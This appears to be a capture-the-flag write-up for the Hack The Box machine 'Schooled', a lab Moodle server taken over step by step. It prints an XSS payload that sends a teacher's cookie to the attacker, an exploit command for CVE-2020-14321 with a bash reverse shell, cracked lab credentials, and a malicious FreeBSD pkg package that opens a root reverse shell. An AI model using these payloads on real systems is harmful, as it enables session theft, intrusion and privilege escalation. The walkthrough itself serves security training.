As always, we start with nmap to discover open ports/services.
Nmap scan report for schooled.htb (10.10.10.234)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
| 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_ 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open http Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000There are 3 open ports, ssh on 22, http on 80, and port 33060 (mysql?). Lets start enumerating http port.
Going to http://10.10.10.234 we only see a static page. ![[Pasted image 20210814163246.png]]
But looking at the bottom of the page there is schooled.htb. ![[Pasted image 20210814163357.png]]
Lets add it to /etc/hosts and visit http://schooled.htb, nothing changed. Now lets run subdomain bruteforcer to discover hidden subdomains, i like using gobuster on hackthebox.
gobuster vhost -u http://schooled.htb -w <wordlist> -t 100
Found .schooled.htb lets also add it to /etc/hosts and visit it.
![[Pasted image 20210814165243.png]]
It is built with moodle which is an open source learning management system (LMS), Maybe it has a critical vulnerability so lets try to enumerate its version. ![[Pasted image 20210814172444.png]]
From its github repo, i found upgrade.txt file that contains the version (3.9). ![[Pasted image 20210814185027.png]]
And by googling the version number i found this exploit (https://github.com/lanzt/CVE-2020-14321) .
Python script to exploit CVE-2020-14321 - Moodle 3.9 - Course enrollments allowed privilege escalation from teacher role into manager role to RCE.
As the exploit said, i have to be a teacher to use this exploit, so lets see how we can get a teacher account. But first lets create a student account and then try to escalate our privileges. ![[Pasted image 20210814190322.png]]
I can only enrol in one course (Mathematics) so lets enrol it. ![[Pasted image 20210814191655.png]]
After enrolment i got redirect to the course content, there's Announccements link. ![[Pasted image 20210814191908.png]]
Checking the Reminder for joining students Announcement, there is a hint from the creator of the box. ![[Pasted image 20210814193100.png]]
We need to set our MoodleNet profile and the teacher will check our profile. The first thing came to my mine is Injecting XSS payload in this input to steal the cookies of the teacher when he views my profile.
<img src=x onerror=this.src='http://10.10.16.22:80/?'+document.cookie;>
![[Pasted image 20210814193816.png]]
When i saved the chages i got a hit on my netcat listener contains the MoodleSession of the teacher. ![[Pasted image 20210814194802.png]]
Now lets replace our cookie with the teacher's cookie (You can use firefox developer's tools). ![[Pasted image 20210814194839.png]]
Refresh the page, and we are now the teacher! now we can use the exploit. ![[Pasted image 20210814194926.png]]
When i run the exploit it executes whoami successfully as www user. ![[Pasted image 20210814202817.png]]
Lets get a reverse shell by adding -c COMMAND. And we are in the box as www user!
python3 exploit.py http://moodle.schooled.htb/moodle/ --cookie 2hlkpkbe850s3c6k2r1ukrdftb -c 'bash -c "bash -i >& /dev/tcp/10.10.16.22/1337 0>&1"'
![[Pasted image 20210814204521.png]]
I found mysql credentials inside config.php in the moodle directory.
moodle:PlaybookMaster2020 ![[Pasted image 20210814211058.png]]
And using find command i found mysql client path. ![[Pasted image 20210816130704.png]]
Now lets connect to mysql using these credentials but we have to do it in one line because we don't have a full interactive shell. ![[Pasted image 20210816131355.png]]
Lets save the admin hash to a file and run hashcat (or john) on it.
hashcat -m 3200 hash.txt rockyou.txt
![[Pasted image 20210816133146.png]]
It got cracked successfully and the password is !QAZ2wsx. Now lets try SSHing to both users with this password.
steve failed to login, but jamie successfully logged in
jamie:!QAZ2wsx ![[Pasted image 20210816133523.png]]
Using sodu -l, we can run /usr/sbin/pkg update and /usr/sbin/pkg install as root. ![[Pasted image 20210816135646.png]]
The first thing i try is going to GTFOBins.io and search the file name. We can get root shell by doing these commands on our machine and then uploading the file to the victim machine. ![[Pasted image 20210816135914.png]]
sudo gem install fpm
TF=$(mktemp -d)
echo 'id' > $TF/x.sh
fpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF
python3 -m http.server
![[Pasted image 20210816140501.png]]
/usr/local/bin/curl http://<attacker-ip>:8000/x-1.0.txz -o x-1.0.txz
sudo pkg install -y --no-repo-update ./x-1.0.txz
![[Pasted image 20210816140619.png]]
As you can see we executed id as root. Now lets replace it with a reverse shell.
TF=$(mktemp -d)
echo 'bash -c "bash -i >& /dev/tcp/10.10.16.13/1337 0>&1"' > $TF/x.sh
fpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF
DON'T forget to run a netcat listener
nc -nvlp 1337
/usr/local/bin/curl http://<attacker-ip>:8000/x-1.0.txz -o x-1.0.txz
sudo pkg install -y --no-repo-update ./x-1.0.txz
Finally we are root :"D ! ![[Pasted image 20210816141443.png]]